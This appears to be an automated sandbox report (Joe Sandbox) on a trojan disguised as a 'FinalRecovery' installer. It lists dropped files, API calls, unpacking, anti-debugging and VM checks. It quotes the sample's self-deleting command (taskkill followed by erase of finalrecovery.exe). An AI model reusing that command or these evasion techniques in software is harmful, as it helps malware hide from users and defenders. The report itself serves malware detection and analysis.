Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: String function: 10003100 appears 34 times
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: String function: 0040F960 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00405964 appears 108 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00403400 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00406AA4 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 0044540C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 004456DC appears 59 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 004526A4 appears 91 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00433B14 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00456D64 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 004078D4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00456B58 appears 93 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00403494 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00408BEC appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: String function: 00403684 appears 218 times

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0042F178 NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00423B6C NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004563D8 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004125C0 NtdllDefWindowProc_A,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004771E0 NtdllDefWindowProc_A,

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_0042E780: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,

Source: file.exe	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: file.tmp.0.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: is-U89TP.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-U89TP.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
Source: is-U89TP.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: is-U89TP.tmp.1.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-U89TP.tmp.1.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped

Source: file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy) 233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730

Source: finalrecovery.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: _RegDLL.tmp.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409420 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00454800 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "finalrecovery.exe")

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.troj.evad.winEXE@12/24@0/4

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_00455028 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification,

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5040:120:WilError_01

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00409BC4 FindResourceA,SizeofResource,LoadResource,LockResource,

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

File created: C:\Program Files (x86)\FgasoftFR

Jump to behavior

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Command line argument: `a}{
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Command line argument: MFE.
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Command line argument: ZK]Z
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Command line argument: ZK]Z

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 1782938 > 1048576

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Unpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack

Detected unpacking (changes PE section rights)

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Unpacked PE file: 2.2.finalrecovery.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.fga20:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Obfuscated command line found

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp" /SL5="$4023C,1536639,54272,C:\Users\user\Desktop\file.exe"

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406590 push 004065CDh; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004080DC push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004040B5 push eax; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404185 push 00404391h; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404206 push 00404391h; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C218 push eax; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004042E8 push 00404391h; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00404283 push 00404391h; ret
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408F10 push 00408F43h; ret
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040992C push 00409969h; ret
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040A027 push ds; ret
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00476228 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004062CC push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045866C push 004586B0h; ret
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004106B8 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040A77C push C00040C3h; ret
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00412910 push 00412973h; ret
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00442A78 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00450B58 push 00450B8Bh; ret
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00450D1C push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00456E00 push 00456E38h; ret
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00492EC8 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040D010 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0045F0C0 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040546D push eax; ret
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040F570 push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00483538 push ecx; mov dword ptr [esp], ecx
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040553D push 00405749h; ret
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004055BE push 00405749h; ret
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0040563B push 00405749h; ret
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004056A0 push 00405749h; ret

Source: finalrecovery.exe.1.dr

Static PE information: section name: .fga20

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_0044AC90 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: initial sample

Static PE information: section name: .text entropy: 7.328115312515883

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Jump to dropped file
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-U89TP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	File created: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_iscrypt.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00423BF4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00423BF4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0042417C IsIconic,SetActiveWindow,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004241C4 IsIconic,SetActiveWindow,SetFocus,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_0041836C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00422844 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00417580 IsIconic,GetCapture,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00481878 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00417CB6 IsIconic,SetWindowPos,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00417CB8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Source: C:\Users\user\Desktop\file.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetSystemTime,DecisionNodes

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-U89TP.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_shfoldr.dll	Jump to dropped file

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA,

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00409B08 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00473B80 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00451DC0 FindFirstFileA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004963A0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00463080 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_004634FC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: 1_2_00461AF4 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00423DAD FindFirstFileExW,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10007E39 FindFirstFileExW,

Source: finalrecovery.exe, 00000002.00000002.323596544.000000000168A000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0042039F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00417B2F mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10007A06 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10005EB5 mov eax, dword ptr fs:[00000030h]

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0040F709 SetUnhandledExceptionFilter,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0040F575 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
